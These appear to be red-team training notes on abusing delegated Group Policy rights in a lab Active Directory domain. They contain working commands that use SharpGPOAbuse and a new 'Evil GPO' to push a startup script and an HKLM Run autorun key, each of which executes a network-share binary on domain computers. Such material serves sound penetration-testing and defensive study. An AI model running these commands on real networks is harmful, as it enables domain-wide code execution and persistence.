Group Policy

Group Policy is the central repository in a forest or domain that controls the configuration of computers and users. Group Policy Objects (GPOs) are sets of configurations that are applied to Organisational Units (OUs). By default, only Domain Admins can create GPOs and link them to OUs, but it's common practice to delegate those rights to other teams. This delegation is typically assigned to domain groups - for example, a "Workstation Admins" group may have rights to manage GPOs that apply to a "Workstation" OU. These can create privilege escalation opportunities by allowing user to apply malicious GPOs to domain admin users or their computers.

- Modify Existing GPO

Modifying an existing GPO that is already applied to one or more OUs is the most straightforward scenario.

Once we have located these (PowerView/GPO), to modify a GPO without the use of GPMC (Group Policy Management Console), we can modify the associated files directly in SYSVOL (the gpcFileSysPath):

ls \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{5059FAC1-5E94-4361-95D3-3BB235A23928}

We can do that manually or use an automated tool such as SharpGPOAbuse (https://github.com/FSecureLABS/SharpGPOAbuse), which several abuses built into it.

To put a startup script in SYSVOL that will be executed each time an effected computer starts:

execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "start /b \\dc-2\software\dns_x64.exe" --GPOName "Vulnerable GPO"

- Create & Link a GPO

First, we need to search for principals that can create new GPOs in the domain (PowerView/GPO), but being able to create a GPO doesn't achieve anything unless it can be linked to an OU, so we will search for pincipals that can link GPOs to an OU (PowerView/GPO).

Then, to manage GPOs from the command line we will use PowerShell RSAT modules. These are an optional install and so usually only found on management workstations. To see if the are present:

powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands

If they are, to create and link a new GPO:

powershell New-GPO -Name "Evil GPO"

Then, for example, to add an HKLM autorun key to the registry (HKLM autoruns require a reboot to execute):

powershell Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\dns_x64.exe" -Type ExpandString

Next, apply the GPO to the target OU:

powershell Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"